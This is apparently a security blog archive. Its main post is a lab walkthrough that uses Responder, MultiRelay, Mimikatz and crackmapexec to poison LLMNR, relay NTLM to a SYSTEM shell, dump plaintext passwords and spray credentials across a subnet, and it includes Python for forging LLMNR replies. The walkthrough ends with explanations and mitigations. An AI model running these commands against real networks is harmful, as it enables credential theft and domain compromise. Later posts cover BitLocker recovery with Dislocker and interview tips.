Responder -> MultiRelay -> Mimikatz -> Crackmapexec -> Windows PWNage

For this post, we’re going to do a scenario-based usage of the following tools: responder, MultiRelay.py, mimikatz, and crackmapexec.

This post was inspired by "Skip Cracking Responder Hashes and Replay Them" by Dank Panda (Richard De La Cruz of Tevora).

The Scenario:

We are on the internal network of a Windows domain.
Users are local administrators on their own workstations.
Domain administrators have separate admin accounts from their normal accounts, but log in with the domain administrator account on the same workstation they use day to day.
We have already scanned the network with Nmap and found the live hosts.
SMB signing is not required on the workstations.
WDigest is on.
LLMNR is enabled.

The Environment:

OS: Windows Server 2008
IP: 10.0.2.15
Services: Active Directory Domain Services, DNS
Logged On Users: kcharles (domain administrator)

OS: Windows 7
IP: 10.0.2.4
Services: Local workstation
Logged On Users: sleaf (domain user/local administrator), sleafadmin (domain administrator)

OS: Windows 7
IP: 10.0.2.5
Services: Local Workstation
Logged On users: jegghead (domain user/local administrator)

OS: Kali Linux
IP: 10.0.2.6
Services: This is our attack machine.
Logged On Users: me 😉

Setting up our attack machine:

Do the usual (e.g. apt-get update && apt-get upgrade).
Install crackmapexec: apt-get install crackmapexec. Responder ships with Kali and lives in /usr/share/responder.

Let’s do this!

First, let's set up Responder. Because MultiRelay has to receive the poisoned SMB and HTTP connections itself, we have to edit Responder's settings and turn off Responder's own HTTP and SMB servers. In Kali Linux the file is /usr/share/responder/Responder.conf, and the switches are the SMB = On and HTTP = On lines in the [Responder Core] section: set both to Off. If you leave them on, Responder will capture the NTLMv2 response itself and MultiRelay will never see the connection.

Now we can turn Responder on. We'll use the flags -I (the interface to listen on) and -rv (-r also answers NetBIOS wredir suffix queries, -v is verbose).

You can see which interface you're using with ifconfig (or ip addr):

Alright, now let’s startup responder.

responder -I eth0 -rv
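As an added example (mine, not from the original post or the Responder project), here is a small Python helper that makes the Responder.conf change described above and verifies it, so you don't start Responder with its own SMB and HTTP servers still grabbing the connections MultiRelay should be relaying. SAMPLE_CONF is a constructed stand-in for /usr/share/responder/Responder.conf: the section and key names are the real ones, the rest of the file is omitted.

```python
import configparser
import re
import sys

# Constructed excerpt of Responder.conf. The real file has more keys and comments;
# only the [Responder Core] server switches matter here.
SAMPLE_CONF = """\
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
"""

# Servers that must be Off for MultiRelay to receive the poisoned connections.
RELAY_CONFLICTS = ("SMB", "HTTP")


def disable_servers(conf_text, servers=RELAY_CONFLICTS):
    """Return conf_text with the named servers switched Off; every other line is kept byte for byte."""
    names = "|".join(map(re.escape, servers))
    pattern = re.compile(r"^([ \t]*(?:%s)[ \t]*=[ \t]*)On[ \t]*$" % names, re.MULTILINE)
    return pattern.sub(lambda m: m.group(1) + "Off", conf_text)


def server_states(conf_text):
    """Parse [Responder Core] and return {server: True/False} for each On/Off switch."""
    cp = configparser.ConfigParser(inline_comment_prefixes=(";", "#"))
    cp.optionxform = str  # keep key case, so we see "SMB" and not "smb"
    cp.read_string(conf_text)
    core = cp["Responder Core"]
    return {k: v.strip().lower() == "on"
            for k, v in core.items() if v.strip().lower() in ("on", "off")}


def relay_safe(conf_text):
    """True when Responder will not answer SMB or HTTP itself (i.e. MultiRelay gets them)."""
    states = server_states(conf_text)
    return not any(states.get(s, False) for s in RELAY_CONFLICTS)


if __name__ == "__main__":
    # Usage: python fix_responder_conf.py [/usr/share/responder/Responder.conf]
    # Without a path the constructed sample is used, so this is safe to run anywhere.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_CONF
    fixed = disable_servers(text)
    if path:
        open(path, "w").write(fixed)
    print("relay-safe before:", relay_safe(text), " after:", relay_safe(fixed))
```

Run it against the sample first; run it with the real path only on your own attack box, since it rewrites the file in place.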

If we want to check which machines on the subnet do not require SMB signing (the precondition for relaying), we can use RunFinger.py from the Responder toolset. On Kali Linux you can find it at:

/usr/share/responder/tools/RunFinger.py

And all you’d do is:

python RunFinger.py -i 10.0.2.0/24

Now, let's set up MultiRelay.py. This is also part of the Responder toolset. On Kali Linux you can find it at:

/usr/share/responder/tools/MultiRelay.py

We'll start MultiRelay by pointing it at a target (-t) and telling it to relay any user's authentication (-u ALL).

python MultiRelay.py -t 10.0.2.4 -u ALL

Remember that sleaf and sleafadmin are logged into this Windows 7 machine.

Now, anyone who has used Responder knows it can take a while to get useful traffic. We're waiting for someone to resolve a name we can poison, so for the purpose of this demo we'll have jegghead browse to a share name that doesn't exist. The hosts file and DNS come up empty, the workstation falls back to LLMNR, and that is what Responder answers.

You'll see that Responder picks up the LLMNR query and poisons it:

In the MultiRelay.py output we'll see that the poisoned connection came in and that jegghead's NTLM authentication was relayed to 10.0.2.4, where she is a local administrator. Note that what gets relayed is the live challenge-response exchange, not a reusable hash: MultiRelay forwards each message between the victim and the target while the handshake is in progress. Because the relayed session belongs to an administrator, MultiRelay can create a service on 10.0.2.4, which gives us a LocalSystem shell there.

From here we can run the commands built into MultiRelay's interactive shell. For this demo we'll run Mimikatz from it.

We can do this within the shell with: mimi sekurlsa::logonpasswords

Here we get sleaf’s password:

And because sleaf used the admin account on the same machine, we get sleafadmin's password too:

Woot woot. Now, we have the credentials of a domain administrator!

So, now we’ve used responder, multirelay, and mimikatz.

So why don't we just use these credentials to Remote Desktop in? We could, if RDP is available. We could do many things: PowerShell remoting, wmic and more. For now we'll use crackmapexec, because it authenticates over SMB using built-in Windows mechanisms and runs its modules in memory, activity that is often not audited or monitored as closely as an interactive logon.

crackmapexec can be used for many things, but we'll focus on a few.

Let's spray our credentials to find out who's logged in where.

We do this by pointing crackmapexec at the subnet, passing the creds and asking for logged-on users:

crackmapexec 10.0.2.0/24 -u 'sleafadmin' -p 'P@ssw0rd' --lusers

(In current crackmapexec releases the protocol is a subcommand and the flag was renamed: crackmapexec smb 10.0.2.0/24 -u sleafadmin -p P@ssw0rd --loggedon-users.)

This is especially useful when the user we have compromised is a local administrator on every workstation. Say sleaf was an admin who never logged into her admin account on her own workstation: we could use jegghead's account to spray the subnet looking for a workstation where some admin did.

We could also spray mimikatz across the subnet to collect credentials. To show that all you need is local administrator on the target, we'll use jegghead's account. Hosts marked "(Pwn3d!)" are ones where she is a local administrator (crackmapexec decides this by testing whether the account can open the ADMIN$ share).

crackmapexec 10.0.2.0/24 -u 'jegghead' -p '1upGirl!' -M mimikatz

The "Waiting on x host(s)" lines are just the slow lab network. The result shows jegghead is a local administrator on the workstations but not on the server.

Now, let’s look at some of the other features.

With the -x switch we can run a command on the host we target. We'll target the server (10.0.2.15) and have it ping our attack machine (10.0.2.6). I'll have Wireshark open to show the ICMP echo requests arriving at our attack machine.

crackmapexec 10.0.2.15 -u 'sleafadmin' -p 'P@ssw0rd' -x 'ping 10.0.2.6'

And here’s the wireshark capture:

So there we are: a few examples of what crackmapexec can do.

In this demo we've used Responder, RunFinger, MultiRelay, Mimikatz and crackmapexec.

Why Things Work

Remember our scenario.

Let’s go over some definitions and some quick additional information.

LLMNR (Link-Local Multicast Name Resolution) – A name-resolution protocol that reuses the DNS packet format but is sent as UDP multicast (group 224.0.0.252, port 5355) on the local link. When resolving a host name, a Windows machine checks its hosts file, then DNS, and only when those fail falls back to LLMNR (and after that the NetBIOS name service). Because it is multicast, LLMNR is not routed: only machines on the same subnet see the query, and any of them may answer it. Responder waits for a machine to ask "Who is X?" and replies "I am X." The victim then connects to Responder's IP for the share or web page it wanted and authenticates with NTLM, and Responder records the NTLMv1/NTLMv2 challenge-response (what its output calls the hash). That value can be cracked offline or, as in this post, relayed to another host while the handshake is still in flight.
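To make the poisoning concrete, here is an added example (written for this page; it is not Responder's code) that builds the LLMNR query a victim multicasts and the unicast answer a poisoner sends back, in the protocol's DNS-style wire format, and then parses that answer the way the victim does. The name fileshare, the transaction ID 0x1234 and the attacker address 10.0.2.6 are constructed inputs; send_query() is the only part that touches the network and is not used by the offline demo.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 multicast group and port from RFC 4795
LLMNR_PORT = 5355
TYPE_A, CLASS_IN = 1, 1


def encode_name(name):
    """DNS wire format: length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(pkt, off):
    """Inverse of encode_name; follows 0xC0 compression pointers. Returns (name, next offset)."""
    labels = []
    while True:
        length = pkt[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                      # pointer to an earlier copy of the name
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(pkt, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(pkt[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def build_query(name, txid):
    """What the victim multicasts: header with QR=0, one question, no answers."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def build_poisoned_answer(query, answer_ip, ttl=30):
    """What a poisoner unicasts back: same ID and question, QR=1, one A record with its own IP.
    The victim never checks that the sender is authoritative for the name; ID and question
    matching is all it does, which is why any host on the link can answer."""
    txid = struct.unpack("!H", query[:2])[0]
    qname_end = query.index(b"\x00", 12) + 1           # end of the question name
    question = query[12:qname_end + 4]                 # name + qtype + qclass
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    rr = (b"\xC0\x0C"                                   # name: pointer to the question at offset 12
          + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4)
          + socket.inet_aton(answer_ip))
    return header + question + rr


def parse_answer(pkt):
    """Victim-side handling: return (txid, name, ip) from a response, raising if malformed."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & 0x8000 or qdcount != 1 or ancount < 1:
        raise ValueError("not an LLMNR response carrying an answer")
    _qname, off = decode_name(pkt, 12)
    off += 4                                           # skip qtype + qclass
    aname, off = decode_name(pkt, off)
    rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    if (rtype, rclass, rdlen) != (TYPE_A, CLASS_IN, 4):
        raise ValueError("unexpected record type or length")
    return txid, aname, socket.inet_ntoa(pkt[off:off + 4])


def send_query(name, txid=0x1234, timeout=1.0):
    """Live check (only on a network you are authorised to test): multicast one query and
    return (peer_ip, parsed_answer) for the first reply, or None if nobody answers."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    s.settimeout(timeout)
    try:
        s.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        data, peer = s.recvfrom(512)
        return peer[0], parse_answer(data)
    except socket.timeout:
        return None
    finally:
        s.close()


if __name__ == "__main__":
    q = build_query("fileshare", 0x1234)               # constructed victim query
    a = build_poisoned_answer(q, "10.0.2.6")           # constructed poisoner reply
    print("query :", q.hex())
    print("answer:", a.hex())
    print("victim resolves", parse_answer(a))
```

A name that never existed gets resolved to the attacker in one round trip; the victim's next step is an SMB or HTTP connection to 10.0.2.6 carrying an NTLM authentication.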

SMB (Server Message Block) – An application-layer protocol used mostly for file shares, printers and remote administration over named pipes. Modern SMB runs directly over TCP port 445; the older NetBIOS-over-TCP/IP transport uses UDP 137 (name service), UDP 138 (datagram service) and TCP 139 (session service). It can also run over legacy transports, but we won't cover that.

NetBIOS – A session and naming API for applications on a LAN. Its name service (NBT-NS, UDP 137) is a broadcast name lookup that Windows tries after LLMNR fails, and Responder poisons it in exactly the same way.

NTLM (NT LAN Manager) – Microsoft's challenge-response authentication protocol. The server sends a random 8-byte challenge and the client answers with a value derived from that challenge and the user's NT hash (NTLMv1 uses DES, NTLMv2 uses HMAC-MD5 over the challenge plus a client-supplied blob). The server never sees the password or the NT hash, only the response. That is why a captured response is tied to one challenge, why it has to be cracked rather than replayed, and why an attacker sitting in the middle can relay it to another server while the exchange is in progress.
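As an added example (mine, not from the post or from Responder), the following Python reproduces what is inside a Responder "hash" line: the NTLMv2 computation from MS-NLMP, using only hmac and md5 from the standard library. It takes an NT hash rather than a password so no MD4 is needed; the hash used is the well-known NT hash of the string password, not the real hash of any account in the scenario, and the domain name LAB, the server challenge, the client challenge and the timestamp are constructed. check_capture() does what hashcat mode 5600 does for each candidate, which shows why cracking is per-challenge and why the relay approach in this post skips it.

```python
import hashlib
import hmac
import struct

# NT hash of the password "password" (MD4 of its UTF-16LE encoding). A well-known test
# value; it is not the hash of any account in the scenario.
NT_HASH_PASSWORD = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")


def ntowf_v2(nt_hash, user, domain):
    """MS-NLMP 3.3.2: HMAC_MD5(NT hash, UNICODE(UPPER(user) + domain)). Domain keeps its case."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def build_blob(client_challenge, timestamp, domain):
    """NTLMv2_CLIENT_CHALLENGE ("temp"): version bytes, FILETIME, client nonce, AV pairs.
    A real client adds more AV pairs (server name, DNS names, ...); one is enough here."""
    nb_domain = domain.encode("utf-16-le")
    av_pairs = struct.pack("<HH", 2, len(nb_domain)) + nb_domain   # MsvAvNbDomainName
    av_pairs += struct.pack("<HH", 0, 0)                            # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def ntlmv2_proof(nt_hash, user, domain, server_challenge, blob):
    """NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || temp). The response on the wire is proof || temp."""
    return hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()


def responder_line(user, domain, server_challenge, proof, blob):
    """The NTLMv2 capture format Responder writes (and hashcat -m 5600 reads)."""
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), proof.hex(), blob.hex())


def check_capture(line, candidate_nt_hash):
    """One cracking step: recompute the proof under a candidate NT hash and compare."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    proof = ntlmv2_proof(candidate_nt_hash, user, domain,
                         bytes.fromhex(chal_hex), bytes.fromhex(blob_hex))
    return hmac.compare_digest(proof, bytes.fromhex(proof_hex))


def simulate_capture(user="jegghead", domain="LAB", nt_hash=NT_HASH_PASSWORD,
                     server_challenge=bytes.fromhex("1122334455667788"),
                     client_challenge=bytes.fromhex("aabbccddeeff0011"),
                     timestamp=0x01D5E3A6D0B1F2C0):
    """Play both sides of one exchange (constructed values) and emit the Responder-style line."""
    blob = build_blob(client_challenge, timestamp, domain)
    proof = ntlmv2_proof(nt_hash, user, domain, server_challenge, blob)
    return responder_line(user, domain, server_challenge, proof, blob)


if __name__ == "__main__":
    line = simulate_capture()
    print(line)
    print("cracks with right hash :", check_capture(line, NT_HASH_PASSWORD))
    print("cracks with wrong hash :", check_capture(line, bytes(16)))
```

Two things follow from the code: the proof changes with every server challenge, so a captured line cannot be pasted back at another server, and the server only ever compares proofs, so a relay that shuttles the real challenge and the real proof between victim and target authenticates without knowing the password at all.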

WDigest – The Digest authentication security package, used for HTTP and SASL (e.g. LDAP) authentication. To be able to answer those challenges, the LSASS process keeps a copy of each logged-on user's cleartext password in memory. With WDigest on, mimikatz's sekurlsa::logonpasswords reads it straight back out.

Crackmapexec – A post-exploitation tool for authenticating to, and running commands on, many hosts at once. Everything is done in memory, through Windows API calls or through built-in Windows features such as SMB, WMI and named pipes.

Mimikatz – A post-exploitation tool known for extracting plaintext passwords, hashes and Kerberos tickets from memory. "Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets."

Responder – “A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. “

Mitigations

Now let's talk about how to protect your organization.

  1. Make SMB signing mandatory. In Group Policy this is "Microsoft network server: Digitally sign communications (always)" plus the matching "Microsoft network client" setting; the registry value behind them is RequireSecuritySignature under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters and ...\LanmanWorkstation\Parameters. An attacker who already has local administrator can flip that value back, so audit changes to those keys and at least you have that measure. Keep in mind that some printers do not support SMB signing and that it adds some network overhead.
  2. Disable WDigest credential caching. On Windows 8.1, Windows 10, Server 2012 R2 and later it is off by default. On Windows 7, Server 2008 R2, Windows 8 and Server 2012, install KB2871997 and set UseLogonCredential to 0 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. Audit that value as well: an attacker with admin can set it back to 1 and simply wait for the next logon.
  3. Limit who has local administrator on their machines.
  4. Limit where domain administrators can log in. Admin accounts should never be used on ordinary workstations; deny them workstation logon so their credentials are never in a workstation's LSASS to begin with.
  5. Disable LLMNR (Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution) and NetBIOS name resolution on the adapters, so there is nothing for Responder to poison in the first place.

Thanks. If you have any questions, use my contact form or the comments section. Let me know if you liked this post.

Writing A Penetration Test Report

Penetration testing can be fun. You get to PWN all the things. You get to solve puzzles. But when it is all done, it's time to write the report for the client.

If you've never written a penetration test report, this post is for you. I exploited some of the vulnerabilities in Metasploitable 2 and wrote up a sample penetration test report.

The sample report: http://gameofpwnz.com/uploads/documents/Metasploitable_Report.docx

Here are some things to make sure you include:

  • Executive Summary (Keep in mind who your audience is)
  • Scope (This should have been determined during pre-engagement)
  • Methods (What is your penetration methodology or formula?)
  • Risk Rating (A risk rating is important in determining which risks need to be mitigated and which could possibly be accepted)
  • Impact (What happens if an attacker exploits the vulnerability?)
  • Remediation (Exploitation is fun, but we need to help the blue team know what the corrective actions would be to mitigate the issue)

Screenshots and steps to reproduce are great for showing the client how you were able to exploit the vulnerability. It also allows the client to check their fixes when they try to reproduce.

This report template is not the actual report template I use in penetration testing, but it’s something I’m willing to share. Feel free to use it. Also, feel free to leave comments about what else you think should be added or any other recommendations.


Dislocker USB with Bitlocker (LAB)

This lab walks you through using Dislocker to view data on a USB disk image that has BitLocker encryption. The BitLocker password is provided.

Real-life use: a hard drive with BitLocker fails to boot and you need to recover data from it.

Bitlocker USB DD image: https://drive.google.com/a/gameofpwnz.com/file/d/0B3KtykBk15nNamdMSVpYaXRPRlU/view?usp=sharing

MD5 Checksum: 90860ff85a78f1421e6f26f44c10b8ae

In Kali, attach the image as a loop device with partition scanning so the BitLocker volume shows up as its own device (for example /dev/loop0p1), which is what you then hand to dislocker:

losetup --partscan --find --show encrypted.001

The Bitlocker Password is password

Use this Procedure: https://gameofpwnz.com/dislocker-recovering-data-from-drive-with-bitlocker-requires-bitlocker-recovery-key-or-password/

The procedure can be altered slightly for this lab. I used a Kali Linux virtual machine instead of a live USB to complete this lab, and I used the password rather than the recovery key. Notice the slight difference in the dislocker command between the two (-u for the password, -p for the recovery key).

Lab created by @GameOfPWNZ

Dislocker: Recovering Data from Drive with Bitlocker – Requires Bitlocker Recovery Key or Password

This procedure is for recovering data from a disk drive with Microsoft Bitlocker Full Disk Encryption when the drive no longer boots.

Also, a lab for practicing this procedure will be provided here: https://gameofpwnz.com/dislockerlab/

Required tools

  • A Kali Linux Live USB or CD/DVD (a Kali virtual machine with the drive attached works too)
  • Network access on the Kali system, for apt-get and git
  • The BitLocker recovery key or the BitLocker password for the drive
  • A USB drive with enough space for the files you want to recover

Procedures

  1. Make sure the hard drive with BitLocker is connected. If you never removed it, then you're good.
  2. Boot from a Kali Linux Live USB or CD/DVD.
  3. Update:
    apt-get update
  4. Install git and the build dependencies:
    apt-get install git libfuse-dev libmbedtls-dev cmake
  5. Git clone Dislocker (GitHub no longer serves the git:// protocol, so use https):
    git clone https://github.com/Aorimn/dislocker.git
  6. Change working directory to the dislocker directory:
    cd dislocker
  7. Run cmake in the Dislocker directory:
    cmake .
  8. Make and make install:
    make
    make install
  9. Find the drive with BitLocker:
    fdisk -l
    (SATA/SCSI disks show up as /dev/sda, /dev/sdb and so on. You want the partition that holds the BitLocker volume, typically the large one such as /dev/sda2, not the whole disk.)
  10. Create the directories tmp and dis:
    mkdir /mnt/tmp
    mkdir /mnt/dis
  11. Run Dislocker. There is no space between -p or -u and the secret, and the -- separates Dislocker's own options from the mount point:
    Using the recovery key:
    dislocker -v -V /dev/<partition from step 9> -p<BitLocker recovery key> -- /mnt/tmp
    (Hopefully you saved your recovery key in Active Directory or somewhere you know. The recovery key is 55 characters with the hyphens: eight groups of six digits.)
    Using the BitLocker password:
    dislocker -v -V /dev/<partition from step 9> -u<BitLocker password> -- /mnt/tmp
  12. Check if it worked:
    ls /mnt/tmp
    (You should see a dislocker-file. If so, it worked.)
  13. Mount the volume read-only, so nothing on the failing drive gets modified:
    mount -o loop,ro /mnt/tmp/dislocker-file /mnt/dis
  14. Change working directory to the volume:
    cd /mnt/dis
  15. List the directory:
    ls
  16. Back up files. To make this easier, open the GUI file explorer twice. In one window open the USB drive; in the other open /mnt/dis. Then copy the files you need to the USB.
  17. Profit.
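As an added helper (mine, not from the post or the Dislocker project), this Python checks a recovery key before you type it and builds the exact dislocker and mount command lines from steps 11 and 13, so the attached -p/-u argument and the -- separator cannot be mistyped. The validation rule (eight six-digit groups, each a multiple of 11 and below 720896, i.e. 65536 * 11) is the format BitLocker recovery passwords follow; the sample key and the device /dev/sda2 are constructed.

```python
import re
import shlex
import subprocess
import sys

RECOVERY_KEY_RE = re.compile(r"^\d{6}(-\d{6}){7}$")   # 48 digits + 7 hyphens = 55 chars


def valid_recovery_key(key):
    """True if key has the BitLocker recovery-password shape: eight 6-digit groups,
    each divisible by 11 and smaller than 720896 (so group / 11 fits in 16 bits)."""
    if not RECOVERY_KEY_RE.match(key):
        return False
    return all(int(g) % 11 == 0 and int(g) < 720896 for g in key.split("-"))


def dislocker_argv(device, recovery_key=None, password=None, mountpoint="/mnt/tmp"):
    """argv for step 11. Exactly one of recovery_key / password is required.
    dislocker takes the secret attached to the flag (-p<key> or -u<password>), and '--'
    ends its own options so the FUSE mount point is not mistaken for one."""
    if (recovery_key is None) == (password is None):
        raise ValueError("give exactly one of recovery_key or password")
    if recovery_key is not None:
        if not valid_recovery_key(recovery_key):
            raise ValueError("recovery key is not 8 groups of 6 digits, each a multiple of 11")
        secret = "-p" + recovery_key
    else:
        secret = "-u" + password
    return ["dislocker", "-v", "-V", device, secret, "--", mountpoint]


def mount_argv(mountpoint="/mnt/tmp", target="/mnt/dis"):
    """argv for step 13: loop-mount the decrypted image read-only."""
    return ["mount", "-o", "loop,ro", mountpoint + "/dislocker-file", target]


def run(argv, dry_run=True):
    """Print the command; execute it only when dry_run is False (needs root and dislocker)."""
    print(shlex.join(argv))
    if not dry_run:
        subprocess.run(argv, check=True)


if __name__ == "__main__":
    # Usage: python dislocker_helper.py /dev/sda2 <recovery-key>   (prints, does not run)
    device = sys.argv[1] if len(sys.argv) > 1 else "/dev/sda2"                 # constructed default
    key = sys.argv[2] if len(sys.argv) > 2 else "111111-222222-333333-444444-555555-666666-707707-000011"
    run(dislocker_argv(device, recovery_key=key))
    run(mount_argv())
```

Pass dry_run=False to run() once you have confirmed the printed commands point at the right partition; the key check catches the usual copy-paste damage (a dropped digit or a swapped group) before dislocker spends time failing on it.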

If you found this tutorial useful, let me know in the comments 🙂 And make sure to check out the lab 🙂

References


http://www.alexandreviot.net/2015/06/10/active-directory-how-to-display-bitlocker-recovery-key/

https://technet.microsoft.com/en-us/library/dd759200(v=ws.11).aspx

Wireless Shack Doc – CD/DVD

Null-Byte Doc

Kali Doc

https://github.com/Aorimn/dislocker

https://linux.die.net/man/1/dislocker

https://askubuntu.com/questions/617950/use-windows-bitlocker-encrypted-drive-on-ubuntu-14-04-lts

Interviews For Beginners – Guide/Opinion/Advice

If you’re seasoned at interviews and you’re constantly getting offers, this post is not for you. This post is for the people who can’t seem to get an offer or feel like they are dropping the ball when it comes to interviews. I’m not a hiring manager of any sort, but I have some advice and tips I’d like to share.

First, let’s start with what I feel is the biggest part of the interview: Know your audience. This is true for an interview and any presentation/talk. In an interview, you are a salesman. You’re selling yourself. But knowing who you’re selling to will help determine diction and depth of explanation. So, who’s giving you the interview? Possible future colleagues? Possible future manager? HR? This will determine how technical you should get.

Now, let's talk about the "I don't know" responses. It's fine not to know everything thrown at you in an interview, especially if you're fresh; however, I would not suggest answering with a simple "I don't know." For most questions, it's not about seeing if you 100% know the answer, but the process of you trying to figure out the answer. "I'm not entirely sure, but knowing process A and process B and a little of process C and how they relate, this seems like a possible solution" sounds a lot better than "I don't know." You may be off, but it shows that you put some thought into the question and brought some troubleshooting technique into your answer. You want to know how processes relate. Also, don't be scared to think out loud. It is encouraged. You shouldn't have a long pause. Talk yourself through a problem. Remember that in the real world, you'll most likely have Google-Fu to use.

That brings me to my next point. Don't cheat. If you're asked a question in a phone or Skype interview, don't start hacking away at your keyboard. The interviewer can hear! If it is something that you'd need to Google, say that. Nobody is impressed with cheaters and liars. You know when you were in school and your teacher said you wouldn't have a calculator at any time? Well, that's not true, but you learned the processes better without a calculator. The interviewer knows the strengths of Google, and Google-Fu is a really good skill to have, but don't try to pass it off as remembered knowledge.

Now, I'm not going to focus on what to wear too much. You should know the popular opinion. Don't wear red. Dress appropriately (slacks, dress shirt, dress shoes, tie, maybe a suit). But remember to look neat. I've seen wrinkled suits. Get it pressed. Iron or steam your shirts. Why go through the effort of wearing nice clothes if you're going to look sloppy? Tuck in your shirt. Buy clothing that fits you. Baggy clothing looks sloppy. Be clean shaven. Keep your hair neat.

Be yourself. Unless you're a horrible person, haha. People want to hire someone who is knowledgeable and someone they feel like they'd get along with. You're going to see each other a lot, so you don't want to clash often.

Ask questions! It shows you're interested and shows that you're not afraid to ask questions. What would a typical day be like in the position? What is the work culture like? What type of growth plan does the organization offer? What type of mentorship program does the organization offer? How big is the team that you would be working with? Remember that while the interview is important in selling yourself, the organization is also silently selling itself. That means if you're the right candidate for them, you have to find out if they're the right organization for you.

Take notes. It'll help you come up with follow-up questions. It'll also help you look up things later that you didn't know during the interview.

Be prepared to answer anything about your resume. Don’t lie on your resume. If something is listed as a core strength on your resume, you better know it.

Be prepared to answer questions that relate to the job posting. The job posting discusses some of the responsibilities you'd have in the position. Do you actually know them? Make sure you do, or at least can be trained pretty easily.

Now, eye contact. It's very important. Don't keep your head down. Keep focused. If you have multiple interviewers, don't just focus on the one that asked you the question. It's like a presentation. You're not just addressing one person. You're addressing them all.

Those are some tips/advice or whatever you want to call it. Comment what you think.